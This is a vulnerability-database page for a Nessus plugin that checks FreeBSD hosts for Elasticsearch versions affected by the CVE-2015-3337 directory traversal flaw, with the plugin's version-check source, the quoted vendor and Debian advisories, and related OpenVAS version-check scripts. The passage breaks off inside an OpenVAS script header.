Search...

FreeBSD : elasticsearch -- directory traversal attack with site plugins (a71e7440-1ba3-11e5-b43d-002590263bf5)

2015-06-26T00:00:00

ID FREEBSD_PKG_A71E74401BA311E5B43D002590263BF5.NASL
Type nessus
Reporter This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.
Modified 2015-06-26T00:00:00

Description

Elastic reports :

Vulnerability Summary: All Elasticsearch versions prior to 1.5.2 and 1.4.5 are vulnerable to a directory traversal attack that allows an attacker to retrieve files from the server running Elasticsearch when one or more site plugins are installed, or when Windows is the server OS.

Remediation Summary: Users should upgrade to 1.4.5 or 1.5.2. Users that do not want to upgrade can address the vulnerability by disabling site plugins. See the CVE description for additional options.

                                        
                                            #%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were  
# extracted from the FreeBSD VuXML database :
#
# Copyright 2003-2018 Jacques Vidrine and contributors
#
# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,
# HTML, PDF, PostScript, RTF and so forth) with or without modification,
# are permitted provided that the following conditions are met:
# 1. Redistributions of source code (VuXML) must retain the above
#    copyright notice, this list of conditions and the following
#    disclaimer as the first lines of this file unmodified.
# 2. Redistributions in compiled form (transformed to other DTDs,
#    published online in any format, converted to PDF, PostScript,
#    RTF and other formats) must reproduce the above copyright
#    notice, this list of conditions and the following disclaimer
#    in the documentation and/or other materials provided with the
#    distribution.
# 
# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS
# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR
# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(84413);
  script_version("2.6");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/06");

  script_cve_id("CVE-2015-3337");
  script_bugtraq_id(74353);
  script_xref(name:"EDB-ID", value:"37054");

  script_name(english:"FreeBSD : elasticsearch -- directory traversal attack with site plugins (a71e7440-1ba3-11e5-b43d-002590263bf5)");
  script_summary(english:"Checks for updated packages in pkg_info output");

  script_set_attribute(
    attribute:"synopsis", 
    value:
"The remote FreeBSD host is missing one or more security-related
updates."
  );
  script_set_attribute(
    attribute:"description", 
    value:
"Elastic reports :

Vulnerability Summary: All Elasticsearch versions prior to 1.5.2 and
1.4.5 are vulnerable to a directory traversal attack that allows an
attacker to retrieve files from the server running Elasticsearch when
one or more site plugins are installed, or when Windows is the server
OS.

Remediation Summary: Users should upgrade to 1.4.5 or 1.5.2. Users
that do not want to upgrade can address the vulnerability by disabling
site plugins. See the CVE description for additional options."
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://www.elastic.co/community/security"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://www.elastic.co/blog/elasticsearch-1-5-2-and-1-4-5-released"
  );
  # https://packetstormsecurity.com/files/131646/Elasticsearch-Directory-Traversal.html
  script_set_attribute(
    attribute:"see_also",
    value:"http://www.nessus.org/u?6b1f8241"
  );
  # http://www.securityfocus.com/archive/1/535385
  script_set_attribute(
    attribute:"see_also",
    value:"https://www.securityfocus.com/archive/1/535385"
  );
  # https://vuxml.freebsd.org/freebsd/a71e7440-1ba3-11e5-b43d-002590263bf5.html
  script_set_attribute(
    attribute:"see_also",
    value:"http://www.nessus.org/u?1636fb0c"
  );
  script_set_attribute(attribute:"solution", value:"Update the affected packages.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:freebsd:freebsd:elasticsearch");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:freebsd:freebsd");

  script_set_attribute(attribute:"vuln_publication_date", value:"2015/04/27");
  script_set_attribute(attribute:"patch_publication_date", value:"2015/06/26");
  script_set_attribute(attribute:"plugin_publication_date", value:"2015/06/26");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_family(english:"FreeBSD Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/FreeBSD/release", "Host/FreeBSD/pkg_info");

  exit(0);
}


include("audit.inc");
include("freebsd_package.inc");


if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
if (!get_kb_item("Host/FreeBSD/release")) audit(AUDIT_OS_NOT, "FreeBSD");
if (!get_kb_item("Host/FreeBSD/pkg_info")) audit(AUDIT_PACKAGE_LIST_MISSING);


flag = 0;

if (pkg_test(save_report:TRUE, pkg:"elasticsearch&lt;1.4.5")) flag++;
if (pkg_test(save_report:TRUE, pkg:"elasticsearch&gt;=1.5.0&lt;1.5.2")) flag++;

if (flag)
{
  if (report_verbosity &gt; 0) security_warning(port:0, extra:pkg_report_get());
  else security_warning(0);
  exit(0);
}
else audit(AUDIT_HOST_NOT, "affected");

JSON Vulners Source

Initial Source

{"id": "FREEBSD_PKG_A71E74401BA311E5B43D002590263BF5.NASL", "bulletinFamily": "scanner", "title": "FreeBSD : elasticsearch -- directory traversal attack with site plugins (a71e7440-1ba3-11e5-b43d-002590263bf5)", "description": "Elastic reports :\n\nVulnerability Summary: All Elasticsearch versions prior to 1.5.2 and\n1.4.5 are vulnerable to a directory traversal attack that allows an\nattacker to retrieve files from the server running Elasticsearch when\none or more site plugins are installed, or when Windows is the server\nOS.\n\nRemediation Summary: Users should upgrade to 1.4.5 or 1.5.2. Users\nthat do not want to upgrade can address the vulnerability by disabling\nsite plugins. See the CVE description for additional options.", "published": "2015-06-26T00:00:00", "modified": "2015-06-26T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "href": "https://www.tenable.com/plugins/nessus/84413", "reporter": "This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?1636fb0c", "https://www.securityfocus.com/archive/1/535385", "http://www.nessus.org/u?6b1f8241", "https://www.elastic.co/community/security", "https://www.elastic.co/blog/elasticsearch-1-5-2-and-1-4-5-released"], "cvelist": ["CVE-2015-3337"], "type": "nessus", "lastseen": "2021-01-07T10:48:54", "edition": 22, "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-3337"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:14437", "SECURITYVULNS:DOC:31992", "SECURITYVULNS:DOC:31990"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310703241", "OPENVAS:703241", "OPENVAS:1361412562310105265"]}, {"type": "exploitdb", "idList": ["EDB-ID:37054"]}, {"type": "debian", "idList": ["DEBIAN:DSA-3241-1:66E01"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:C495535BB475BBDF733BEC03D1BDE040"]}, {"type": "freebsd", "idList": ["A71E7440-1BA3-11E5-B43D-002590263BF5"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:131718"]}, {"type": "nessus", "idList": ["DEBIAN_DSA-3241.NASL"]}], "modified": "2021-01-07T10:48:54", "rev": 2}, "score": {"value": 5.3, "vector": "NONE", "modified": "2021-01-07T10:48:54", "rev": 2}, "vulnersScore": 5.3}, "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(84413);\n script_version(\"2.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2015-3337\");\n script_bugtraq_id(74353);\n script_xref(name:\"EDB-ID\", value:\"37054\");\n\n script_name(english:\"FreeBSD : elasticsearch -- directory traversal attack with site plugins (a71e7440-1ba3-11e5-b43d-002590263bf5)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Elastic reports :\n\nVulnerability Summary: All Elasticsearch versions prior to 1.5.2 and\n1.4.5 are vulnerable to a directory traversal attack that allows an\nattacker to retrieve files from the server running Elasticsearch when\none or more site plugins are installed, or when Windows is the server\nOS.\n\nRemediation Summary: Users should upgrade to 1.4.5 or 1.5.2. Users\nthat do not want to upgrade can address the vulnerability by disabling\nsite plugins. See the CVE description for additional options.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.elastic.co/community/security\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.elastic.co/blog/elasticsearch-1-5-2-and-1-4-5-released\"\n );\n # https://packetstormsecurity.com/files/131646/Elasticsearch-Directory-Traversal.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6b1f8241\"\n );\n # http://www.securityfocus.com/archive/1/535385\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.securityfocus.com/archive/1/535385\"\n );\n # https://vuxml.freebsd.org/freebsd/a71e7440-1ba3-11e5-b43d-002590263bf5.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1636fb0c\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:elasticsearch\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/04/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"elasticsearch<1.4.5\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"elasticsearch>=1.5.0<1.5.2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "naslFamily": "FreeBSD Local Security Checks", "pluginID": "84413", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:elasticsearch"], "scheme": null}

{"cve": [{"lastseen": "2020-12-09T20:03:03", "description": "Directory traversal vulnerability in Elasticsearch before 1.4.5 and 1.5.x before 1.5.2, when a site plugin is enabled, allows remote attackers to read arbitrary files via unspecified vectors.", "edition": 5, "cvss3": {}, "published": "2015-05-01T15:59:00", "title": "CVE-2015-3337", "type": "cve", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3337"], "modified": "2015-06-25T16:07:00", "cpe": ["cpe:/a:elasticsearch:elasticsearch:1.5.0", "cpe:/a:elasticsearch:elasticsearch:1.5.1", "cpe:/a:elasticsearch:elasticsearch:1.4.4"], "id": "CVE-2015-3337", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3337", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:elasticsearch:elasticsearch:1.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:elasticsearch:elasticsearch:1.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:elasticsearch:elasticsearch:1.5.1:*:*:*:*:*:*:*"]}], "securityvulns": [{"lastseen": "2018-08-31T11:10:58", "bulletinFamily": "software", "cvelist": ["CVE-2015-3337"], "description": "\r\n\r\nSummary:\r\nAll Elasticsearch versions prior to 1.5.2 and 1.4.5 are vulnerable to a directory traversal attack that allows an attacker to retrieve files from the server running Elasticsearch. This vulnerability is not present in the initial installation of Elasticsearch. The vulnerability is exposed when a \u201csite plugin\u201d is installed. Elastic\u2019s Marvel plugin and many community-sponsored plugins (e.g. Kopf, BigDesk, Head) are site plugins. Elastic Shield, Licensing, Cloud-AWS, Cloud-GCE, Cloud-Azure, the analysis plugins, and the river plugins are not site plugins.\r\n\r\nWe have been assigned CVE-2015-3337 for this issue.\r\n\r\n\r\nFixed versions:\r\nVersions 1.5.2 and 1.4.5 have addressed the vulnerability.\r\n\r\n\r\nRemediation:\r\nUsers should upgrade to 1.5.2 or 1.4.5. This will address the vulnerability and preserve site plugin functionality.\r\n\r\nUsers that do not want to upgrade can address the vulnerability in several ways, but these options will break any site plugin:\r\n- Set \u201chttp.disable_sites\u201d to true and restart the Elasticsearch node.\r\n- Use a firewall or proxy to block HTTP requests to /_plugin.\r\n- Uninstall all site plugins from all Elasticsearch nodes.\r\n\r\n\r\nCredit:\r\nJohn Heasman of DocuSign reported this issue.\r\n\r\n\r\nCVSS\r\nOverall CVSS score: 4.3\r\n\r\n", "edition": 1, "modified": "2015-05-05T00:00:00", "published": "2015-05-05T00:00:00", "id": "SECURITYVULNS:DOC:31992", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31992", "title": "Elasticsearch vulnerability CVE-2015-3337", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:58", "bulletinFamily": "software", "cvelist": ["CVE-2015-3337"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n- -------------------------------------------------------------------------\r\nDebian Security Advisory DSA-3241-1 security@debian.org\r\nhttp://www.debian.org/security/ Moritz Muehlenhoff\r\nApril 29, 2015 http://www.debian.org/security/faq\r\n- -------------------------------------------------------------------------\r\n\r\nPackage : elasticsearch\r\nCVE ID : CVE-2015-3337\r\n\r\nJohn Heasman discovered that the site plugin handling of the\r\nElasticsearch search engine was susceptible to directory traversal.\r\n\r\nFor the stable distribution (jessie), this problem has been fixed in\r\nversion 1.0.3+dfsg-5+deb8u1.\r\n\r\nFor the unstable distribution (sid), this problem will be fixed soon.\r\n\r\nWe recommend that you upgrade your elasticsearch packages.\r\n\r\nFurther information about Debian Security Advisories, how to apply\r\nthese updates to your system and frequently asked questions can be\r\nfound at: https://www.debian.org/security/\r\n\r\nMailing list: debian-security-announce@lists.debian.org\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1\r\n\r\niQIcBAEBAgAGBQJVQT+hAAoJEBDCk7bDfE42jx8P/RaRyGnWhAqU0IGWoQOb8j2/\r\nz2g1Sk9DWHepcuGPIwtF9KXUFFYWCSyjuwouWYMxQanb/Ue9wMo+olZrcZ1yYSnT\r\nIjRNwLkcbXsN2M+nAw6cxJzEq1/RFis5G740xkTUYyhxRSuAWZSV6JzbTWl7dq2g\r\nRsZ1gnNZj2kUlMSJjK6640qw6MYNIjjsEDiEN+X7jHohuN2Hkpg+4Rgqg+CvArCo\r\nM3Ltz8Fpc2jc0quQZYoU2BNyyjfEowc76ejeMYxlItKHo8y00m68JrTfR1jMj0R5\r\nwvZlgU0F18DX28qznKHdsy82JBwkYzvwpls2RfMkugY8ZM8CkcVwFFFLhvZWDwrU\r\nEL6Afr7DZSqt8mrnzYtGUAJ5Ix3ZgpD+zyXTQbfqiV/+fqKuU9al+JAFQgjquvkr\r\n3UfA2KTQL4M82KBgU40XcDVIr8LCi6ywvUtfEDENnPG1JJ/9CQ/2DKTu7AADyD71\r\nyBoz2e7H2+ObbbCbPwTWqoofYJfGQabJ7LDdvFOrXwM/KNL/QeUNP54Zvvo4ix0Y\r\nDkbtW2VamVU+u96XBqJEpVJcd2xAqbNliJCppOe5dxrgOhem8Oy90gMzhzKfrEqM\r\n7836ldqOECKwQGpbEBG+XshTEjslBBb3YLJzlIEFfMzbVZMnzbW+XuLpUoUa4pMw\r\nrTK6iUAcCzYaLd7/mOms\r\n=2XrL\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2015-05-05T00:00:00", "published": "2015-05-05T00:00:00", "id": "SECURITYVULNS:DOC:31990", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31990", "title": "[SECURITY] [DSA 3241-1] elasticsearch security update", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:00", "bulletinFamily": "software", "cvelist": ["CVE-2015-3337"], "description": "Directory traversal via requests to /_plugin", "edition": 1, "modified": "2015-05-05T00:00:00", "published": "2015-05-05T00:00:00", "id": "SECURITYVULNS:VULN:14437", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14437", "title": "Elasticsearch directory traversal", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "openvas": [{"lastseen": "2017-07-24T12:53:14", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-3337"], "description": "John Heasman discovered that the site plugin handling of the\nElasticsearch search engine was susceptible to directory traversal.", "modified": "2017-07-07T00:00:00", "published": "2015-04-29T00:00:00", "id": "OPENVAS:703241", "href": "http://plugins.openvas.org/nasl.php?oid=703241", "type": "openvas", "title": "Debian Security Advisory DSA 3241-1 (elasticsearch - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3241.nasl 6609 2017-07-07 12:05:59Z cfischer $\n# Auto-generated from advisory DSA 3241-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703241);\n script_version(\"$Revision: 6609 $\");\n script_cve_id(\"CVE-2015-3337\");\n script_name(\"Debian Security Advisory DSA 3241-1 (elasticsearch - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:59 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2015-04-29 00:00:00 +0200 (Wed, 29 Apr 2015)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2015/dsa-3241.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"elasticsearch on Debian Linux\");\n script_tag(name: \"insight\", value: \"Elasticsearch is a distributed RESTful search engine built for the cloud.\");\n script_tag(name: \"solution\", value: \"For the stable distribution (jessie), this problem has been fixed in\nversion 1.0.3+dfsg-5+deb8u1.\n\nFor the unstable distribution (sid), this problem will be fixed soon.\n\nWe recommend that you upgrade your elasticsearch packages.\");\n script_tag(name: \"summary\", value: \"John Heasman discovered that the site plugin handling of the\nElasticsearch search engine was susceptible to directory traversal.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software version using the apt package manager.\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"elasticsearch\", ver:\"1.0.3+dfsg-5+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-05-29T18:36:08", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-3337"], "description": "John Heasman discovered that the site plugin handling of the\nElasticsearch search engine was susceptible to directory traversal.", "modified": "2019-03-18T00:00:00", "published": "2015-04-29T00:00:00", "id": "OPENVAS:1361412562310703241", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703241", "type": "openvas", "title": "Debian Security Advisory DSA 3241-1 (elasticsearch - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3241.nasl 14278 2019-03-18 14:47:26Z cfischer $\n# Auto-generated from advisory DSA 3241-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703241\");\n script_version(\"$Revision: 14278 $\");\n script_cve_id(\"CVE-2015-3337\");\n script_name(\"Debian Security Advisory DSA 3241-1 (elasticsearch - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:47:26 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-04-29 00:00:00 +0200 (Wed, 29 Apr 2015)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2015/dsa-3241.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n script_tag(name:\"affected\", value:\"elasticsearch on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (jessie), this problem has been fixed in\nversion 1.0.3+dfsg-5+deb8u1.\n\nFor the unstable distribution (sid), this problem will be fixed soon.\n\nWe recommend that you upgrade your elasticsearch packages.\");\n script_tag(name:\"summary\", value:\"John Heasman discovered that the site plugin handling of the\nElasticsearch search engine was susceptible to directory traversal.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"elasticsearch\", ver:\"1.0.3+dfsg-5+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-05-12T17:25:00", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-3337"], "description": "Elasticsearch is prone to a directory traversal vulnerability.", "modified": "2020-05-08T00:00:00", "published": "2015-05-05T00:00:00", "id": "OPENVAS:1361412562310105265", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105265", "type": "openvas", "title": "Elasticsearch Directory Traversal Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Elasticsearch Directory Traversal Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the 